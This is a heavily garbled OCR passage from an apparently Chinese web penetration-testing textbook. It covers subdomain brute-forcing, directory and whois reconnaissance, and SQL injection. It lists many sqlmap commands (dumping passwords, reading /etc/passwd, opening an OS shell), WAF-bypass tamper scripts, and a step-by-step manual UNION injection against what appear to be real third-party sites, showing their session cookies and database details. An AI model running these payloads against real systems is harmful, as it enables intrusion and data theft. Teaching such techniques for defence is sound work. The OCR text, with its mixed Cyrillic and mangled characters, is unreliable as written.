БЯ 管理 员 ; python - subDomainsBrute,py baidu.com -f subnames,txt -o xx.txt 
red.baidu.com 10.26.3.244, 10.91.160.44, 10.36.4.138, 10.42.4.856Щ 


еп јоу. ради. сот 117.185.16.17 

пе .baidu.com 180.149 .132 .155 

mt .baidu.com 18.288.6.11 

умеди. Ба1 Чи. сот 111 .13.12.201, 111.13.108.159 

6 - Баз Чи - сот 119 .?25.218.7?7й, 119.25 .-21?.199 

аа .Базди. сот 10.99.57.42 

everything .baidu.con 611.135.162.103 

zhanzhang-baidu.com 189 149 132 23 

hs „Батди -соп 220.181 .164.42 

ddm. Базйи. сот 1й.5й.14.165. 10.26.5. 6 

hr .haidqdu com 61.135.185.136. 220.181.57.21? 

atom.baidu.con 10.26.25.78 

btp.baidu.com 1й.46 .135 .26 

zhidao .baidu.con 111.13.12.103, 111.13.108.13 

mobile .baidu.con 220.181.163.133. 180.149.131.211 

taiwan .baidu . соп 228 .181.52.216, 220.181.5'7.217 

aus.baidu.com 1й.22й.14й.59 

writing.baidu.com 111.13.101.58 

Song „Бати „сот 189 .9?.33.1329 

аке. раду. сот 10.42.137 .45 

ъі11Љљоака. ради. сот 19.46 .7.199 

п>8 - Баз Чи - сот 111 206 .37.164 Ш 
211 found 1 48798 remaining ! 6341 scanned іп 224.32 зссопЯз Б 


图 3-3 ”利用 脚本 爆破 出 211 个 子 域名 


т! 


2. 目录 信息 
在 渗透 中 ， 目 录 是 极为 重要 的 信息 。 如 果 得 到 了 根 目 录 ， 便 可 以 结合 注入 进行 


А 黑客 与 安全 技术 指南 


GetShell 〈 取 得 权限 ) ， 如 果 有 了 Web 目 录 ， 便 可 以 党 试 对 后 台地 址 进行 爆破 ， 对 后 台 文 
件 进行 猜 解 。 由 此 可 见 目录 的 重要 性 ， 而 获得 目录 的 常见 方法 如 下 所 述 。 
(1) phpinfo 和 探 针 文件 。phpinfo 文 件 如 图 3-4 所 示 。 


3-4 phpinfo 文 件 
PHP 探 针 文件 如 图 3-5 所 示 。 


RSRS NPE М 277 458 РНЕНЫЕ : 173.245.52.98 
Ез sn „Ше ап 22 16:19:19 EST 2012 х86 64 


А " | Арасће/2.2.23 (Unix) mod_ssl/2.2.23 Ореп 81 /0.9.8е- 
а шы Е Gpe-rhel5 mod Бибтие/1.4 mod fegid/2.3.6 


| zh-cn.zh:q=0.8.en-us;q=0.5,=n;a =0,3 80 
Гасан В . š . . 
webmaste zS “w. № H 


— 4. 


| 2013-03-18 03:43:12 报 务 器 已 到 行 时 间 | 4813579 
| AMD Орїсгоп(їт) Processor 6128 | #Ъ®800,000 | 7:512 КВ | Водотпір5:3999,99 x16 

Ои, 096ву, 0951, 1009614, 0%wa, 0%irq, 0%softirq | 256855 

6228 1321043 С, BA 82.092 С, FA 1238.951 С, АЕ 6.2196 


> 
物理 内 存 : H 31438 G , Н 9.251 G , SA 22.187 G = 29.42% 


Cache 化 内 存 为 7.748 с ,使 用 24,55 96 | Buffers ЗЕЕ 0.571 G 
НЕЧЕН 0.932 G ,真实 内 存 空间 30,506 С Е 26% (| |((|о(о(о/ | | | | 0 


SWAP 医 ; 共 33.406 б, B&A 0 G, =й 33.406 6, (450% 


0.02 0.05 0.00 1/365 


| вее: 998 М 728K 6728 Bix: 998 М 728K 672 В 
| 已 接收 : 已 发 送 : 
Б: 236 676M 940K 6208 ЕСІ 2961016М 610К1023В 


date libxml openssl рс 115 bcmath calendar ctype curl dom filter ttp gd 
gettext hash ісопу 3233100 јзоп mbstring mysql posix Reflection standard SirglexML 3Р1 зоскетз 
8 ісе imap tokenizer xrl xmlreader xmlwriter cgi-fcgi сАссс1сгаъог icnCube Loader Zend Optimizer 


РНР/БЕ ( phpinfo ) : PHPINFO PHP 版 本 ( php_version ) : 

pHp 运 行 方式 : CGI-FCGI Шан АРИ ( петогу Ней): 

PHP 安 全 模式 (safe_mode] : |x | РОЗТАЕЕБЕВЬНЙИЫ ( post тах size ) : 
上 传 文件 县 大 限制 (upload_max filesize ) : | 20м тела ( precision } : 
ЮЖНЕЕ] ( г-ах -кесиһоп, bme ) : 308 зоске ЗЕТІН ( default_socket_Hmeout ) ; 
РНР АХ ( дос root) | Г FEREZ (шег dir] ， 


102 ( enable_dl) Š | ү 指定 包含 文件 目录 (include_path ) : 
V 


Шемен ( register globals] : 


3-5 ”PHP 探 针 文件 
(2) 搜索 引擎 。 在 渗透 中 ， 搜 索引 擎 是 一 把 利器 ， 兴 试用 搜索 引擎 的 语法 ， 往 往 会 


STAA (display_errors ) : 


第 3 章 ” Web 渗透 测 试 一 一 透 过 攻击 看 防御 = Mh 


有 意 想 不 到 的 收获 。 
下 面 是 一 些 第 用 的 搜索 引擎 语法 。 


> domain: 用 domain 命 令 可 以 查找 跟 某 一 网 站 的 相关 信息 。 

> filetype: 限制 查找 文件 的 格式 类 型 。 目 前 可 以 查找 的 文件 类 型 有 pdf.doc/Xls ppt/ rtf。 
> шип: 限定 查询 匹配 只 搜索 URL 链接。 

> link: 网 站 外 链接 查询 。 

> Site: 网 站 整 站 搜索 引擎 收录 查询 。 

> intitle: 搜索 网 页 标题 中 含有 的 关键 词 。 


(3) 扫 拉 器。 对 渗透 目标 用 第 见 的 目录 进行 暴力 破解 。 此 方法 往往 对 那些 安全 性 较 
低 的 网 站 有 效 。 
(4) 爬虫 。 谎 虫 在 渗透 中 起 寿 很 重要 的 作用 ， 用 来 发现 一 些 隐 蔽 的 目录 。 


3.1.3 Whois 信息 搜集 


Whois 即 域名 查询 协议 ， 是 用 来 查询 域名 的 IP 地 址 以 及 所 有 者 等 信息 的 传输 协议 。 网 
络 上 有 很 多 提供 Whois 查 询 的 平台 ， 如 图 3-6 所 示 ， 将 目标 域名 输入 查询 ， 便 可 以 看 到 目标 
站 点 的 域名 服务 器 、DNS 服 务 器 以 及 其 他 隐私 信息 。 


域名 Whois 查 询 工 县 


А 86: | тарегз. 


тарезпе 常用 域 书后 号 ;whois 吉 疝 ; 
тараз. сс " 查询 


mapers.net 相关 查询 ; НЕ ЛАВА ВЛЕЕ ІРНӘНЕІЗ РАЗАН Бал Аека а ня ранее 
域名 : mapers.net 111811126455 

НЕЙ 2015-06-06 20:57, а ЗЕЯ 

ЕА: РОВ LTD. D/B/A PUBLICDOMAINREGISTRY.COM 

更 新 时 间 : 20152028019 

上 时 间 : 20152019109 

过 # 朋 j 间 : 20162019109 

КНЕ: whois.PublicDomainRegistry.com 

0458-52: F1G1NS1.DNSPOO.NET 


DNSRR32S: F1G1NS2.DNSPOO.NE T 


ВЕРИЛ: ЕМ ЕРЕН А http://www.icann.org/ ept RE um ГАРАЖА 


3-6 ”Whois 查询 结果 


3.1.4 ”爆破 信息 搜集 


“爆破 ”是 一 种 形象 的 说 法 ， 即 骏 力 破解 ， 一 般 使 用 穷 举 或 字典 〈 大 量 数据 集合 ) 列 
举 的 方法 。 在 渗透 测试 中 ， 爆 破 的 作用 非常 重要 。 特 别 是 针对 一 些 大 型 企业 的 内 部 系统 ， 
很 多 员工 为 了 使 用 方便 ， 而 忽略 了 密码 的 安全 性 ， 和 弟弟 使 用 一 些 弱 口令 作为 密码 ， 而 用 户 
名 往往 就 是 其 姓名 或 拼写 。 黑 客 可 能 尝试 利用 搜索 引擎 和 社工 库 对 渗透 目标 的 员工 名 单 进行 
搜集 ， 然 后 进行 密码 字典 生成 和 灯 破 。 防 范 这 种 攻击 的 方式 ， 一 是 增加 验证 ， 让 骏 力 破解 无 
法 进行 ， 例 如 验证 码 ; 二 是 提高 密码 安全 性 ， 这 在 附录 中 会 详细 探讨 。 
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32 SQL 注入 


SQL 注入 曾 在 几 年 前 就 流行 于 世 ， 而 如 今 ，SQL 注 入 仍 是 最 流行 的 攻击 手段 之 一 ， 开 
发 者 们 对 其 伤 透 了 有 脑筋。 当然， 主要 是 由 于 注入 攻击 的 灵活 性 ， 一 个 目的 ， 多 个 语句 ， 多 
Е 

SQL 注 入 可 以 分 为 工具 和 和 手工 两 类 ， 工 具 因 为 目 动 化 ， 常 常会 比 手工 高 效 很 多 ， 但 因 
为 其 并 不 是 有 针对 性 地 进行 注入 ， 相 比 手工 注入 就 局 限 了 很 多 。 


3.2.1 注入 的 挖掘 


an НЕН Л, НИНЕ РЕГ ПІНЕТТЕЗОІЗЕ А. m AF ARE, 
会 忽略 一 些 隐藏 链接 、API 调 用 、http 头 中 的 参数 。 那 如 何 进行 全 面 的 SQL 注入 挖掘 呢 ? 
кашы. 
由 图 3-7 可 以 看 到 操作 时 间 Web 站 点 发 送 的 每 个 http 数 据 包 。 数 据 包 中 包含 了 http 头 和 
传递 的 参数 ， 而 注入 常常 就 发 生 在 这 些 参数 中 ， 图 3-8 简 单 分 析 了 http 数 据 包 的 结构 (大 方 
框 为 http 头 ， 小 方 框 为 参数 ) 。 


Б Burp Suite Professional v1.5.18 - licensed to LarryLau < (o e "= 


Burp Intruder Repeater Window Help 


Target Г Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Options | Alerts 


| intercept ау Options | 


Filter: Hiding CSS, image and general binary content |?) 
Params | Edited | Status | Length | MIME t... | Extension Title 

103 http'//yunfangwl com GET 上 common азр?кі-1 а 200 8359 HTML asp ФОШОАС ЕРЕО š 
104 ”http:Wyunfangwlcom СЕТ Mew.asp g Са 20 9118 HTML asp ОЕЕз ри Ее | 
105 тир /ушт/апди сот СЕТ Јрозар О О 200 10428 HTML asp ОЕАЕ + ЕРҒО 
106 http.//yunfangwl.com СЕТ Jjob.asp Ы СІ 200 7637 HTML р ЕРАОБЕ. ЕРГО 
417 ”http-Wyunfangwl сот СЕТ /obook asp g [j 200 12470 HTML p УЕА ЕРЙ 
125 -http-/fyunfangwl.com СЕТ 5/5. ј5 О Я 200 565 pt js 
131 http'//www. jsxyidc.com GET Jxycms_js/jquery.DB_tabMotion... (1 СІ 200 377 script в 
132 Һир www |вхукіс сот СЕТ jxycms jsijquery B 国 日 script js 

9 Ч scnpt js 


14 http'//www.jsxyidc.com GET /куств |ъ/соттоп.)5 
一 и Б 


图 3-7 ”对 站 点 操作 时 的 数据 包 


зег- а: Mozilla/5. 0 (Windows МТ 6.1; ку:39.0) Сеско/20100101 а 0 
Accept: text/html,application/xhtml+xml,application/xml;d=0.9,*/*;cd=0.8 
дссерс-Папачацче: zh-CN, zh; = 8, еп-05;4=0.5,еп;4=0.3 

Accept-Encoding: gzip, defla 

ооКіг: ASPSEISS ен АЕ НИНЕ 

onnection: keep-alive 

ontent-Type: application/x-wwg-form-urlencoded 

ontent-Length: 4 
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ха Т AE Т жива, ВЕРЕН ЛК Г. РЕ, ЕЯ 
个 参数 是 否 可 以 进行 注入 。 下 面 来 探讨 一 下 常见 的 判断 方法 。 


1. 报错 注入 


一 般 情况 下 ， 大 部 分 编程 语言 为 了 方便 开发 人 员 可 以 灵活 地 调试 和 修复 其 应 用 程序 ， 
会 使 用 一 些 内 置 的 错误 处 理 库 ， 从 而 简化 调试 程序 的 时 间 。 而 报错 注入 就 是 输入 一 些 特殊 
字符 使 语法 产生 错误 ， 从 而 判断 是 否 存 在 注入 ， 常 见 的 特殊 字符 如 下 。 

(1) ' 

(2) \ 

(3); 

(4) 0000 

(5) ) 

(6) ( 

(7) # 

(8) " 

在 提交 参数 时 加 上 这 些 特殊 字符 ， 如 果 报 错 ， 那 么 极 有 可 能 是 一 个 注入 点 ， 如 图 3-9 
所 示 。 


ft JET Database Engine WR ' 50040614 


ЗЕЕ ЗЕД ':4=146°’ фо 


/ветз 4е1а11. asp» П 10 


图 3-9 单 引 号 报错 实例 
2. АФ 


何 为 盲 注 ? 其 实 盲 注 和 报错 注入 是 相对 的 ， 报 错 注 入 会 返回 一 些 数 据 库 的 具体 信息 ， 
而 盲 注 只 会 返回 true 与 false 两 种 值 ， 从 而 对 想得到 的 信息 进行 猜 解 ， 因 此 相 比 报错 注入 ， 
讶 注 的 效率 较为 低下 。 常 见 的 讶 注 分 为 两 种 ， 布 尔 型 盲 注 和 基于 时 间 的 盲 注 。 这 两 者 的 区 
别 在 于 判断 注入 的 条 件 不 同 。 布 尔 型 盲 注 是 对 页 面 啊 应 的 信息 进行 判断 ， 而 基于 时 间 的 讶 
注 也 就 是 党 说 的 延迟 注入 ， 是 对 页 和 面 啊 应 的 时 间 进 行 判 断 。 

对 于 布尔 型 讶 注 ， 在 网 站 默认 关闭 错误 信息 时 ， 如 果 这 时 并 没有 做 其 他 处 理 ， 可 以 
通过 逻辑 表达 式 来 进行 盲 注 。 大 概 的 原理 是 :如 果 笔 者 的 逻辑 表达 式 是 正确 的 ， 整 个 SQL 
便 询 语句 一 定 会 返回 结果 ， 那 么 网 站 显示 了 正确 的 内 容 。 基 于 这 个 原理 ， 可 以 通过 注入 依 
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次 获取 每 个 字符 。 和 弟 见 的 判断 方法 中 最 经 典 的 便 是 and 1-1; ара 1=2 了 ， 当 提交 and 1=1 时 
页 面 正 常 ，and 1=2 时 页 面 不 正常 ， 则 存在 注入 。 不 过 ， 这 种 判断 方法 是 针对 数字 型 参数 
的 ， 与 其 类 似 的 还 有 or 2221; or 1>2; хог 1=1; хог 1=2 等 。 但 对 于 字符 型 参数 ， 常 用 的 
语句 是 ' and '1'= 1 :;'and'1'=2， 其 判断 方法 和 数字 型 相同 。 

对 于 基于 时 间 的 盲 注 ， 一 般 是 在 条 件 更 为 苛刻 的 情况 下 (例如 最 终 进 行 了 跳 转 ) 使 
用 的 一 种 注入 的 方式 。 以 MySQIL 为 例 ， 对 其 的 判断 方法 主要 涉及 sleep 和 benchmartk 两 个 也 
数 ， 这 里 以 benchmark 函 数 为 例 进行 介绍 。 

BENCHMARK ( count, expr ) 

其 作用 是 重复 count 次 执行 表达 式 expr， 提 交 后 根据 其 响应 时 间 来 判断 表达 式 正 确 
与 否 ， 是 否 存在 注入 。 当 然 ， 延 人 返 注 入 一 般 都 交 给 工具 或 脚本 去 分 析 ， 能 大 大 提高 准确 性 
和 效率 。 


3.2.2 工具 注入 


随 看 注入 攻击 的 流行 ， 市 场 上 工具 的 种 类 也 较为 繁多 。 常 见 的 有 sqlmap、Havjj 等 ， 其 
中 sqlmap 因 为 人 免费、 开源 、 功 能 强大 等 特点 ， 受 到 了 广大 使 用 者 的 推 染 。 本 节 便 来 详细 讲 
解 Windows 系 统 下 sqlmap 的 使 用 。 


1. sqlImap 的 安装 


(1) sqlmap 需 要 在 Python 环 境 下 才能 运行 ， 因 此 在 安 状 sqlmap 之 前 需要 安装 Python。 
在 Windows 下 ， 下 载 并 运行 Python 的 安装 包 ，Python 由 于 2.x 版 本 与 3.x 版 本 性 能 上 有 一 定 差 
异 ， 所 以 我 们 使 用 2.7.2 版 本 (Python 的 版 本 问题 是 个 很 有 趣 的 话题 ， 各 位 如 果 感 兴趣 可 以 
目 己 查 找 资料 进行 了 解 )， 如 图 3-10 所 示 。 

(2) 安 闭 完成 后 ， 需 要 添加 环境 变量 。 安 闭路 径 是 D: \python， 执 行 “我 的 电 
脑 ” 一 “属性 ”命令 ， 打 开 “ 高 级 ”选项 卡 ， 如 图 3-11 所 示 。 


要 进行 大 多 数 更 次 ， 您 必须 作为 管理 员 登 录 。 
性 能 


视觉 效果 ， 处 理 器 计划 ， 内 存 使 用 ， 以 及 虚拟 内 让 


Select whether to install Python 2.7.2 
for all users of this computer- 


用 户 配置 文件 
与 您 登录 有 关 的 点 面 仅 置 


© Instal for ай users 


О Instal just for me (not avatable оп Windows Vista) 
[Ж а). 


启动 和 故障 恢复 
казва, Ката a 


REO). 
[йй т)... ) 


вао | 
图 3-10 ”Windows 环 境 下 安装 Python 图 3-11 配置 运行 环境 


| Back |[не&>» ] [Омош | 


Гад 0 
9. / 
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(3) 单 击 “环境 变量 ”按钮 ， 在 path 中 添加 D: друшоп (25% 45) 并 保存 ， 如 图 


3-12 上 所 示 。 


(4) Python 安装 配置 完毕 后 ， 下 载 sqlmap 的 压缩 包 并 解压 ， 解 压 路 径 是 D: \руфоп\ 
sqlmap\。 打 开 命 令 提示 从 ， 用 cd 命令 切换 到 sqlmap 解 压 路 任 ， 试 看 运行 一 下 sqlmap.py， 检 


但 其 是 否 安装 成 功 ， 如 图 3-13 所 示 。 


— = YY 


系统 厘 性 EJ 
计算 机 名 | 硬件 系统 保护 | 远程 
环境 变量 


高 级 


Administrator HAPSE (U) 
ЖШ 值 


编辑 系统 变量 


变量 名 (и): ath 


ТЕЙ (V): .100\Тоо1 5 УВз па 5$ е11 АС овтоп7 МЕЧ 


ШЕ 取消 


Path C:\Windows\system32:C. \Windows: 
РАТНЕХТ СОМ;. ЕХЕ:. ВАТ; . СМП; . VBS ;. УВЕ; 
РЕОСЕЗЯПК АК “ав 


жй)... | RED... | Өй 


确定 | 取消 | 


3-12 ”设置 环境 变量 


2. sqlmap 的 使 用 


ШЖ 管理 员 : python -sqlmap.py = | |= 
Microsoft Windous ПЖ. 6.1.7601] 
ПЗ 所 有 «с» 2009 Microsoft Corporation. 保留 所 有 权 El = 


(еш. о 


D: хруслоп ?сй зу! пар 


D: Хрублоп са тар с 4 1пар. py 
Usage; р: хрубнопзаТпарчва пар. рчу [options] 


саТпар-ру: error: missing а mandatory option <-а, -и, -1, -п, -ғ, -9. -с, --ъ ха 
purge-output ок dependencies), use -h for basic ок -hh for adv 


Press Enter to сопбіпис... 


3-13 ”检查 是 否 安装 成 功 


sqlmap 是 一 球 半 目 动 化 工具 ， 需 要 手动 输入 命令 进行 注入 。 第 见 的 命令 如 下 这 里 假 


设 日 标 URL 为 http://url/news?id=1) 。 


sqlmap.py -u "http://url/news?id=1" --current-user # 获 取 当 前 用 户 名 称 
sqlmap.py -u "http://url/news?id=1" --current-db # 获 取 当 前 数据 库 名 称 
sqlmap.py -u "http://url/news?id=1" --tables -D "db пате" # 人 列表 名 


sqlmap.py -u "http://url/news?id=1" --columns -T "tablename" 
users-D "db name" -v 0 # 列 字段 

ваіпар.ру ú "ЪЕСр: //ог1/пеиз?19-1" dumpi -С "column пате" -T 
"table name" -D "ар папе" # 获 取 字 段 内 容 


sqlmap.py -u "http://url/news?1d=1" --smart --level 3 --users 


#smart В level 执行 测试 等 级 


sqlmap.py -u "http://url/news?id=1" --dbms "Mysql" --пзегз 


#dbms 指 定数 据 库 类 型 
sqlmap.py -u "http://url/news?id=1" --изег5 # 列 数据 库 用 户 
sqlmap.py -u "http://url/news?id=1" --dbs # 列 数据 库 
sqlmap.py -u "http://url/news?id=1" --passwords # 数 据 库 用 户 密 码 


sqlmap.py -u "http://url/news?id=1" --passwords-U root -v 0 
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# 列 出 指定 用 户 数据 库 密码 
sqlmap.py -u "http://url/news?id=1" --ашар -C "раѕѕмога, иѕег, іа" 
-Т "Тарепаше" -р "ар паше" 

--start 1 --сіор 20 # 列 出 指定 字段 , 列 出 20 条 
sqlmap.py -u "http://url/news?id=1" --ашпр-а11 -v 0 
# 列 出 所 有 数据 库 和 表 


sqlmap.py -u "http://url/news?id=1" --рг1у11едез # 碍 看 权限 
sqlmap.py -и "http://url/news?id=1" --рг1у11едез -U "WEB USR" 


# 查 看 指定 用 户 权限 
sqlmap.py -u "http://url/news?id=1" --15-дра -v 1 ЕБЕТ 
sqlmap.py -u "http://url/news?id=1" --го1ез # 枚 举 数 据 库 用 户 角色 


sqlmap.py -u "http://url/news?id=1" --udf-inject 

# 导 入 用 户 自 定义 函数 ( 获取 系统 权限 ! ) 
sqlmap.py -u "http://url/news?id=1" --апмр-а11 --exclude-sysdbs 
-v 0 # 列 出 当前 库 所 有 表 
sqlmap.py -u "http://url/news?id=1" --union-cols #union 查询 表 记 录 
sqlmap.py -u "http://url/news?id=1" --cookie "cookie" #cookie 注 入 


sqlmap.py -u "http://url/news?id=1" -р #2 banner E. 

sqlmap.py -u "http://url/news?id=1" --data "SearchValue= 请 输入 关键 

“Ғезійа-1" роз A 

sqlmap.py -u "http://url/news?id=1" -v 1 -f # 指 纹 判别 数据 库 类 型 

sqlmap.py -u "http://url/news?id=1" --ргоху"Һһіір://127.0.0.1:8118" 
# 代 理 注 入 

sqlmap.py ü "http://uri/news?1d=1" —string"STRING ОМ ТЕПЕ РАСЕ" 
# 指 定 关键 词 


sqlmap.py -u "http://url/news?id=1" --з41-з1е11 #8478я за1 #3 
sqlmap.py -u "http://url/news?id=1" --Н1е /etc/passwd 
sqlmap.py -u "http://url/news?id=1" --os-cmd=whoami #ЯЯ пр 
sqlmap.py -u "http://url/news?id=1" --о5-5һе11 ЖАН зпе11 
sqlmap.py -u "http://url/news?id=1" --05-рип #Койзпет1 
sqlmap.py -u "http://url/news?id=1" --гед-геаа ВЕБ ЖЗ 
sqlmap.py -u "http://url/news?id=1" --арѕ-о "sqlmap.py.log" 

# 保 存 进度 
sqlmap.py -u "http://url/news?id=1" --dbs -o "sqlmap.py.log" --гезише 

# 恢 复 已 保存 进度 
sqlmap.py -g "google 语 法 " --dump-all --batch 

#google 搜 索 注 入 点 自动 跑 出 所 有 字段 
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3. 对 WAF 的 绕 过 


在 实际 注入 测试 中 ， 遇 到 WAF (Web Application Firewall， 网 站 应 用 级 入 侵 防 御 系 
统 ) 是 党 有 的 事 ， 我 们 可 以 绕 过 WAF 继 续 进 行 注 入 检测 ， 本 节 讨 论 sqlmap 对 WAF 的 绕 过 。 
在 sqlmap 中 ， 用 -tamper 命 令 可 以 调用 内 置 的 绕 过 脚本 ， 具 体 语 法 格式 如 sqlmap.py -u 
"url" -v 1 --dbs -tamper "脚本 名 "。 表 3-1 是 常用 的 脚本 名 及 作用 。 
表 3-1 sqlmap 常 用 脚本 名 及 其 作用 


8 代替 引号 
ET < = 
绕 过 过 滤 '=' 替换 空格 字符 〈") 
十 过滤 ' > '， 用 GREATEST 替 换 大 于 号 
格 奉 换 为 # 号 、 随 机 字符 串 以 及 换行 符 
绕 过 过 滤 双 引号 ， 蔡 换 字 符 和 双 引 号 
每 个 关键 字 之 前 添加 MySQL 版 本 评论 
格 蔡 换 为 # 号 以 及 更 多 随机 字符 串 和 换行 符 
有 效 负 荷 结束 位 置 加 载 零 字 节 字符 编码 


2 


Базеб4 ЯН £ 1 


| 
= 

= 

9 


|= [Е 
Er | E | E 
ст 

г 

м 

П 


x 


Pt | № 


x 


га 


НУ 
Це 
ща 
Ж 
ФЕ 
5 
= 
R 

28 
dl 


i= 
са 
Hh 


格 ， 包 含 完 整 的 查询 版 本 注释 

空格 替换 其 他 空白 符号 (mysq]) 

用 between 蔡 换 大 于 号 〈>) 

替换 空格 字符 СО С") 后 跟 一 个 破 折 号 注释 一 个 新 行 ('n') 

围绕 SQL 关 键 字 添加 多 个 空格 

用 + 替换 空格 

代替 空格 字符 后 与 一 个 有 效 的 随机 空白 字符 的 SQL 语句 ， 然后 替换 = 为 like 
双重 查询 语句 。 取 代 predefined SQL 关键 字 with 表 示 suitable юг (Я 


Ур 


如 тер!асе("ЗЕГЕСТ", "")filters 

代替 空格 字符 《"") 从 一 个 随机 的 空白 字符 可 选 字 符 的 有 效 集 
奶 加 sp password, JADBMS H ЖУН ЭЖЖ ЛЕ ЕН ЗА ІНІ K ë 
双 URIL 编 码 〈 不 处 理 已 编码 的 ) 

替换 UNION ALL SELECT UNION SELECT 


随机 大 小 写 


ә То © la | со „ 7) с в |=] | wm v | оо | по la lo о 
ЕЕЕ Г ЕЕ Е ЕЕЕ ЕЕЕ Е 
2 
|а |ва ые Е |6 12 | |2 е Е а Ее Еа 
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续 表 


追加 特制 的 字符 串 
关键 字 前 加 注释 


3.2.3 手工 注入 


在 渗透 测试 中 ， 再 强大 的 注入 工具 也 会 有 局 限 性 ， 而 手工 注入 恰恰 能 解决 这 一 弱点 。 
当然 ， 手 工 注 入 需要 渗透 者 对 其 针对 的 数据 库 语 法 有 一 定 了 解 。 不 过 ， 因 为 SQL 注入 的 灵 
活性 与 多 样 性 ， 如 果 详 细 深 入 地 讲 ， 悉 人 能 单独 与 成 一 本 书 。 在 这 里 ， 笔 者 就 选取 最 具 代 
表 性 的 例子 给 大 家 示范 。 

(1) 对 渗透 目标 进行 注入 的 挖 据 ， 这 里 对 挖 据 的 过 程 就 不 表 奖 述 了 。 确 定 了 注入 
点 ， 便 可 以 开始 进行 注入 测试 了 ， 如 图 3-14 所 示 。 


ontent-Length: 13 
ookie: Database error 
lvt 9723485е19#163еВе518саб94е959ср9= 1435891291; 
| lpvt 9723485е19716З3еВе518саб94е959с59- 1435891445; 
iheima=73ka52rq55tl2t8tn86h2lvrs0; | 501: SELECT aws оріс .* FROM aws topic WHERE ( 
гг зезз10п-90ге4п6 1 94чачд9споуо0па1п41; topic title = ''') ORDER ВУ topic 14 А5С 


rz__user_login=2-31I18rj1NPLwNSj4crO1l1fLMyoywoNbHlerv2NPR 
NeOm6Sul5yYw7DZzMTRnuDJyc blZ-dxduvysfQnN Fnc-WrpPbySvUW Error Message: Mysqli prepare error: You have an error 
oyfnLKbmoywoLunwNS3j3ttDnz-bPxpcaq; in your SQL syntax; check the manual that corresponds 
NZZDATA1000524616=1204303738-1435886381-http%253A%s252F% to your MySQL server version for the right syntax to 
S2SFwww.iheima.comy252F%w7C1435886381 use near '''') ORDER BY `topic ій А$С' at line 1 
onnection: keep-alive 
exception 'Zend Db Statement Mysqli Ехсерііол' with 
ache-Control: no-cache message 'Mysqli prepare error: You have an error іп 
your SQL syntax; check the manual that corresponds to 
opic_title=' your MySQL server version for the right syntax to use 
near '''') ORDER BY Форіс ій ASC' at line 1' in 
/data/www/ask.iheima.com/system/Zend/Db /Statement /Mysql 
i.php:77 
Stack trace: 
#0 


图 3-14 ”MySQL 查询 语句 示例 
注意 : 这 里 用 到 了 Burp 的 repeater 功 能 。 
由 图 3-14 可 以 看 到 POST 下 的 参数 topic_title 存 在 报错 注入 ， 这 里 提交 了 单 引 号 ， 返 回 
了 错误 信息 。 
错误 信息 中 返回 了 出 错 的 查询 语句 如 下 : 


SELECT 'амз topic'.* FROM 'амз topic' WHERE ( topic title = ''') ORDER 


ВУ "Горас 19" А5С 


(2) 这 是 一 条 MySQL 碍 询 语句 。 再 来 看 看 提交 的 数据 位 于 语句 的 什么 位 置 ， 提 交 
xx'， 可 以 看 到 得 询 语句 如 下 : 

SELECT "ам іоріс".% FROM 'амз Форіс" WHERE ( Форс &1&1е = "'хх'') 

ОКПЕК ВУ "Торас за" АЗС 
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(3) 确定 了 提交 的 数据 所 处 位 置 ， 便 可 以 用 闭合 语句 试 试 。 假 设 这 里 提交 的 是 xx'") 
#， 于 是 查询 语句 就 变 成 了 : 

SELECT "анз topic'.* FROM 'амз topic' WHERE ( topic title = 'хх') +") 

ORDER BY "сорте за" ASC 

而 # 企 MySQL 中 是 注释 待 ， 所 以 实际 上 香 询 语句 变 成 了 : 

SELECT "амз topic'.* FROM 'амз topic' WHERE ( topic title ='хх') 


(4) 成 功 财 合 。 因 此 构造 的 语句 格式 应 该 是 : 
') ”注入 语句 + 


(5) 知道 注入 语句 的 格式 了 ， 再 来 看 看 查询 语句 本 身 ， 因 为 是 在 WHERE 后 面 ， 所 以 
只 能 用 联合 查询 或 者 盲 注 进行 注入 。 先 用 ORDER ВУ 进行 猜 解 ， 可 以 看 到 ORDER BY 16 
时 正常 返回 ， 而 ORDER BY 17 时 报错 。 因 此 可 以 构造 : 

RR ГЕО по ТАТЕ Е 


ШІЕІЗ-150 25, ВЛЕЕ, Ша AAE КЕКТІ ВСИ o 


("згабиз": "1", "гез": [{"Еоріс id":"1521","topic title":" 
“ "add time" : "1421635405" ,"discuss count":"1",'"topic де 
sceription":"" "topic pic":"","topic Тоск":0,"Тосиз coun 
.141","Еоріс title":"2" add ёіте" : "3" ,"discuss count": 
"4" ,"topic description":"5","topic pic":"6","topic lock 
"sort" :"16"}],"info" :"\u6210\u529f"} 


Hm lvt 9723485e19f163e8e518ca694e959cb9=1435891291; 

Hm lpvt_9723485e19f163e8e518ca694e959cb9=1435891445; 
iheima=73ka52rq55t12t8tn86h21lvrsD0O; 

rz Session=90te4m6lgqdqadq4cmovoDnglh41; 

гг user_login=2-3I18rj1NPLwNSj4crO1fLMyoyvoNbHlerv2NPR 
xNeOm6SulSyYw7DZzMTRnuDJyc_b1l1Z-dxduvysfQnN_Fnc-WrpPbySvW 
xoyfnLKEbmoyvwvoLunwNSjittDnz-bPxpcaq; 
NZZDATA1000524616=1204303738-1435886381-httpyx253Ay252F%w 
52Fwww.iheima.comy252F%7C1435886381 


Pragma: no-cache 
ache-Control: no-cache 


opic_title=') UNION SELECT 
1,2,3,4,5,6,7,В,8,10,11,12,13,14,15,1Е В 


图 3-15 ”联合 查询 
(6) 用 user0、database0 等 函数 代 进 去 查询 试 试 。 
r] UNION ЗЕБЕСТ қізегір;2-3:4 5 6 J BS 25 10 11.12713 ПЯ 15 теу 
提交 后 ， 结 果 如 图 3-16 所 示 。 


Pragma: no-cache 
Content-Length: 583 


(—("status":"1","res":[("topic id":"1521","topic title":" 
","add time" : "1421635405" ,"discuss count":"1","topic de 
scription":"", "topic pic":"", "topic lock":0,"focus coun 
из пазка . .61.105","Торас 11 Ле":"2", "айа те": "3", " 
discuss сопи!": "4", "Торас дезсгар:тол": "5" ,"Торас ріс": 
14", ! Туре": "15" ,"зог!": "16" |," зло": " \116210\0529ғ" } 


图 3-16 ”查询 数据 库 用 户 名 
可 以 看 到 user 为 ask(@*.*.61.105， 再 将 user0 巷 换 成 database0) 试 试 。 
如 图 3-17 所 示 ， 这 里 可 以 看 到 数据 库 为 ask， 接 下 来 继续 爆破 表 名 。 构 造 : 
') union select group сопса (distinct table пате), 2,3,4,5,6,7,8,9,10, 


11,12,13,14,15,16 frm information schema.tables where table schema=database() # 
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Pragma: no-cache 
Content-Length: 570 


("status":"1","res":[("topic id":"1521","topic title" :" 
